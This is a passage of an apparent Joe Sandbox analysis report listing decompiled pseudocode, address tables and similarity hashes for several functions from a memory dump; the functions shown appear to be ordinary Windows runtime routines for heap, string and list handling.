                                          0x010b8b6c
                                          0x010b8b11
                                          0x01109cd5
                                          0x01109cd5
                                          0x010b8b17
                                          0x010b8b1a
                                          0x010b8b1a
                                          0x00000000
                                          0x010b8ad5
                                          0x010b8a89

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12902947f55111ef7b8819026442c7620410c891580089924a949a52df7d6f4d
                                          • Instruction ID: 6d90d4ed5eeacbb5be770bcbffe9d82b796dd30dc04cb27b6d588e3e3e70d839
                                          • Opcode Fuzzy Hash: 12902947f55111ef7b8819026442c7620410c891580089924a949a52df7d6f4d
                                          • Instruction Fuzzy Hash: D64174B4A0022D9BDB64DF69CCD8AE9B7F8FB54300F1085EAD95997252D7709E80CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116FDE2 Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E0116FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0116FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01170A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E010C7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01161608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01172B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0116C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0116DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E010C7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0116A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                          0x0116fde7
                                          0x0116fde8
                                          0x0116fdec
                                          0x0116fdee
                                          0x0116fdf5
                                          0x0116fdf7
                                          0x0116fdfc
                                          0x0116fe19
                                          0x0116fe22
                                          0x0116fe26
                                          0x0116fec6
                                          0x0116fecd
                                          0x0116fed5
                                          0x0116fee7
                                          0x0116fed7
                                          0x0116fee0
                                          0x0116fee0
                                          0x0116feef
                                          0x0116ff00
                                          0x0116ff02
                                          0x0116ff07
                                          0x0116ff07
                                          0x00000000
                                          0x0116feef
                                          0x0116fe33
                                          0x0116fe55
                                          0x0116fe59
                                          0x0116fe5b
                                          0x0116fe5e
                                          0x0116fe69
                                          0x0116fe6d
                                          0x0116fe6d
                                          0x0116fe69
                                          0x0116fe35
                                          0x0116fe41
                                          0x0116fe41
                                          0x0116fe79
                                          0x0116fe8b
                                          0x0116fe7b
                                          0x0116fe84
                                          0x0116fe84
                                          0x0116fe93
                                          0x00000000
                                          0x0116fea8
                                          0x0116feba
                                          0x00000000
                                          0x0116feba
                                          0x0116fdfe
                                          0x0116fe01
                                          0x0116fe02
                                          0x0116fe08
                                          0x0116ff0c
                                          0x0116ff14
                                          0x0116ff14

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction ID: 7656a1dd70707f3444d8c309db9de1637038ad58839d1d62ac8cf943c366cb13
                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction Fuzzy Hash: 1F3126323006426FD32A9B6CDC64F6A7FEDEBC5A40F094058E5468B342DB72DC22C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116EA55 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E0116EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E010C2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0116E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E010AF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E010BFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0116AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0116BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E010C7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0115FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E010BFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0116A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                          0x0116ea55
                                          0x0116ea66
                                          0x0116ea68
                                          0x0116ea6c
                                          0x0116ea6f
                                          0x0116ea72
                                          0x0116ea75
                                          0x0116ea7a
                                          0x0116ea7a
                                          0x0116ea7e
                                          0x0116ea80
                                          0x0116ea85
                                          0x0116ea8b
                                          0x0116eab5
                                          0x0116eabc
                                          0x0116eabf
                                          0x0116eabf
                                          0x0116eaca
                                          0x0116eace
                                          0x0116ead0
                                          0x0116eae4
                                          0x0116eaeb
                                          0x0116eaf0
                                          0x0116eaf5
                                          0x0116eb09
                                          0x0116eb0d
                                          0x0116eb1d
                                          0x0116eb2d
                                          0x0116eb38
                                          0x0116eb3d
                                          0x0116eb41
                                          0x0116eb4a
                                          0x0116eb60
                                          0x0116eb4c
                                          0x0116eb52
                                          0x0116eb59
                                          0x0116eb59
                                          0x0116eb68
                                          0x0116eb71
                                          0x0116eb71
                                          0x0116ea8d
                                          0x0116ea8f
                                          0x0116ea92
                                          0x0116ea97
                                          0x0116ea97
                                          0x0116ea9b
                                          0x0116ea9c
                                          0x0116ea9e
                                          0x0116eaa6
                                          0x0116eaa6
                                          0x0116eb7e

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction ID: fff6ece54cc78d1780fcee249595e9437cca1fce686e8381281d70855a62d900
                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction Fuzzy Hash: 4031D4766047069BC719DF28C880AABB7ADFFC0610F044A2DF59287641DF31E815CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011269A6 Relevance: .1, Instructions: 108COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E011269A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x119d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L010B6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01126BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E010E9980() >= 0) {
							E010C2280(_t56, 0x1198778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1198774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1198774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E010AB6F0(0x108c338, 0x108c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E010E9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E010E95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E010BFFB0(_t68, _t77, 0x1198778);
				}
				_pop(_t78);
				return E010EB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                          0x011269b5
                                          0x011269be
                                          0x011269c3
                                          0x011269c9
                                          0x011269cc
                                          0x011269d1
                                          0x011269d3
                                          0x011269de
                                          0x011269e1
                                          0x011269ea
                                          0x011269f6
                                          0x011269fe
                                          0x01126a13
                                          0x01126a14
                                          0x01126a15
                                          0x01126a16
                                          0x01126a1e
                                          0x01126a26
                                          0x01126a31
                                          0x01126a36
                                          0x01126a37
                                          0x01126a40
                                          0x01126a49
                                          0x01126a4a
                                          0x01126a53
                                          0x01126a59
                                          0x01126a5d
                                          0x01126a5e
                                          0x01126a64
                                          0x01126a67
                                          0x01126a6a
                                          0x01126a6d
                                          0x01126a70
                                          0x01126a77
                                          0x01126a7d
                                          0x01126a86
                                          0x01126a89
                                          0x01126a9c
                                          0x01126a9f
                                          0x01126aa2
                                          0x01126aa5
                                          0x01126aaf
                                          0x01126ab1
                                          0x01126ab8
                                          0x01126ab9
                                          0x01126abb
                                          0x01126abe
                                          0x01126ac5
                                          0x01126ac5
                                          0x01126aaf
                                          0x01126a40
                                          0x01126a26
                                          0x011269fe
                                          0x01126ace
                                          0x01126ad0
                                          0x01126ad3
                                          0x01126ad8
                                          0x01126adf
                                          0x01126adf
                                          0x01126ae8
                                          0x01126aef
                                          0x01126aef
                                          0x01126af9
                                          0x01126b06

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6628e3d82630b0a57c513547127c986a3390a9b2a276f028f2eeb556f99153d7
                                          • Instruction ID: 0eb674e171c166691bb14ee9584edb4db98af0fb14f9ee71c13e8f7ce9eef213
                                          • Opcode Fuzzy Hash: 6628e3d82630b0a57c513547127c986a3390a9b2a276f028f2eeb556f99153d7
                                          • Instruction Fuzzy Hash: 63419DB1D00219AFDB28DFAAD940BFEBBF4FF48714F14812AE955A7280DB709905CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A5210 Relevance: .1, Instructions: 107COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E010A5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E010A52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E010E95D0();
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E010BEB70(_t54, 0x11979a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E010E95D0();
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E010BEB70(_t54, 0x11979a0);
						}
						return _t52;
					}
					L5:
					_t33 = E010EF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E010BEB70(_t54, 0x11979a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E010E95D0();
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                          0x010a5220
                                          0x010a5224
                                          0x01100d13
                                          0x01100d16
                                          0x01100d19
                                          0x010a522a
                                          0x010a522a
                                          0x010a522d
                                          0x010a522d
                                          0x010a5231
                                          0x010a5235
                                          0x010a5239
                                          0x01100d5c
                                          0x01100d62
                                          0x00000000
                                          0x00000000
                                          0x01100d6a
                                          0x01100d7b
                                          0x01100d7f
                                          0x01100d81
                                          0x01100d84
                                          0x01100d95
                                          0x01100d95
                                          0x01100d6c
                                          0x01100d71
                                          0x01100d71
                                          0x01100d9a
                                          0x00000000
                                          0x010a524a
                                          0x010a524a
                                          0x010a5250
                                          0x01100d24
                                          0x01100d35
                                          0x01100d39
                                          0x01100d3b
                                          0x01100d3e
                                          0x01100d50
                                          0x01100d50
                                          0x01100d26
                                          0x01100d2b
                                          0x01100d2b
                                          0x00000000
                                          0x01100d55
                                          0x010a5256
                                          0x010a525b
                                          0x010a5265
                                          0x01100da7
                                          0x010a526b
                                          0x010a526e
                                          0x010a5272
                                          0x01100db1
                                          0x01100db4
                                          0x01100dc5
                                          0x01100dc5
                                          0x010a5272
                                          0x010a5278
                                          0x010a527e
                                          0x010a528a
                                          0x010a528c
                                          0x010a528d
                                          0x00000000
                                          0x010a5280
                                          0x010a5282
                                          0x010a5288
                                          0x010a529f
                                          0x010a5292
                                          0x00000000
                                          0x010a5292
                                          0x00000000
                                          0x010a5288
                                          0x010a527e

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cbc7f90d210fe480aa43cf7ebd44c550413a1783a93f71fb9016cbaada995c19
                                          • Instruction ID: c18da42eb76895b1cbc0e123e95b1df5d17dbf59b94fad6675bbf56301611eb7
                                          • Opcode Fuzzy Hash: cbc7f90d210fe480aa43cf7ebd44c550413a1783a93f71fb9016cbaada995c19
                                          • Instruction Fuzzy Hash: 9B310831651701EBCB2AAB58CC81FAE77A5FF657A0F514619F5990B1D0EBB0E800CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E3D43 Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010E3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E010B7B60(0, _t61, 0x10811c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E010B7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L010C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                          0x010e3d4c
                                          0x010e3d50
                                          0x010e3d55
                                          0x010e3d5e
                                          0x0111e79a
                                          0x00000000
                                          0x0111e79a
                                          0x010e3d68
                                          0x0111e789
                                          0x010e3d9d
                                          0x010e3da3
                                          0x010e3daf
                                          0x010e3db5
                                          0x010e3dbc
                                          0x010e3dc4
                                          0x010e3dc9
                                          0x010e3dce
                                          0x0111e7ae
                                          0x0111e7ae
                                          0x010e3dde
                                          0x010e3de2
                                          0x010e3de7
                                          0x010e3e0d
                                          0x010e3e13
                                          0x010e3e16
                                          0x010e3e1e
                                          0x010e3e25
                                          0x010e3e28
                                          0x00000000
                                          0x00000000
                                          0x010e3e2a
                                          0x010e3e2f
                                          0x010e3e37
                                          0x010e3e37
                                          0x00000000
                                          0x010e3e37
                                          0x010e3e31
                                          0x00000000
                                          0x010e3e31
                                          0x010e3e20
                                          0x010e3e20
                                          0x010e3e35
                                          0x00000000
                                          0x010e3de9
                                          0x010e3de9
                                          0x010e3de9
                                          0x010e3dee
                                          0x010e3dfd
                                          0x010e3dff
                                          0x010e3e02
                                          0x010e3e05
                                          0x010e3e05
                                          0x00000000
                                          0x010e3df0
                                          0x010e3de7
                                          0x0111e78f
                                          0x0111e794
                                          0x010e3d79
                                          0x010e3d84
                                          0x010e3d89
                                          0x010e3d8e
                                          0x00000000
                                          0x0111e7a4
                                          0x010e3d96
                                          0x010e3d9a
                                          0x00000000
                                          0x010e3d9a
                                          0x00000000
                                          0x0111e794
                                          0x010e3d6e
                                          0x010e3d73
                                          0x00000000
                                          0x0111e7b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e6665367904c6b29d79eaa1bd6a42e1887423d185591b9beb65dd8b44886ca1
                                          • Instruction ID: 272fc656577d961dbeb1e6a4340aa9d8aa4fb87c42669b8e73a847d378899f71
                                          • Opcode Fuzzy Hash: 3e6665367904c6b29d79eaa1bd6a42e1887423d185591b9beb65dd8b44886ca1
                                          • Instruction Fuzzy Hash: 4731CF31A05615DFDB299F2ED445A6ABFF4FF85700B0580AAE986CF390E731D840C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DA61C Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E010DA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1180220);
				E010FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1197b9c; // 0x0
				_t55 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E010FD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1197b10 =  *0x1197b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x119536c; // 0x771a5368
					if( *_t51 != 0x1195368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1195368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x119536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E010DA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                          0x010da61c
                                          0x010da61e
                                          0x010da623
                                          0x010da628
                                          0x010da62b
                                          0x010da62d
                                          0x010da648
                                          0x010da64a
                                          0x010da64f
                                          0x01119b44
                                          0x010da6ec
                                          0x010da6f1
                                          0x010da6f1
                                          0x010da655
                                          0x010da657
                                          0x010da65a
                                          0x010da65d
                                          0x010da662
                                          0x010da663
                                          0x010da667
                                          0x010da668
                                          0x010da66d
                                          0x010da706
                                          0x010da706
                                          0x01119bda
                                          0x01119be6
                                          0x01119beb
                                          0x00000000
                                          0x01119beb
                                          0x010da679
                                          0x01119b7a
                                          0x00000000
                                          0x01119b7a
                                          0x010da683
                                          0x010da6f4
                                          0x010da6f7
                                          0x010da6f9
                                          0x010da6fd
                                          0x010da6a0
                                          0x010da6a0
                                          0x010da6ad
                                          0x010da6af
                                          0x010da6b4
                                          0x01119ba7
                                          0x01119bac
                                          0x00000000
                                          0x00000000
                                          0x01119bc6
                                          0x01119bce
                                          0x01119bd1
                                          0x01119bd3
                                          0x01119bd3
                                          0x00000000
                                          0x01119bd1
                                          0x010da6bd
                                          0x010da6c3
                                          0x010da6c6
                                          0x010da6d2
                                          0x010da701
                                          0x010da704
                                          0x00000000
                                          0x010da704
                                          0x010da6d4
                                          0x010da6d6
                                          0x010da6d9
                                          0x010da6db
                                          0x010da6e1
                                          0x010da6e6
                                          0x010da6e8
                                          0x010da6e8
                                          0x010da6ea
                                          0x00000000
                                          0x010da6ea
                                          0x010da688
                                          0x010da692
                                          0x010da694
                                          0x010da699
                                          0x00000000
                                          0x00000000
                                          0x010da69d
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c78f48d76fe94eaccf56ebaba167d0315e131ee4c57b7b15c9dd9f3295d9e00
                                          • Instruction ID: bd08a0612839e8427b74654a10705140124669e6cc6632b65d2776781e7d186a
                                          • Opcode Fuzzy Hash: 2c78f48d76fe94eaccf56ebaba167d0315e131ee4c57b7b15c9dd9f3295d9e00
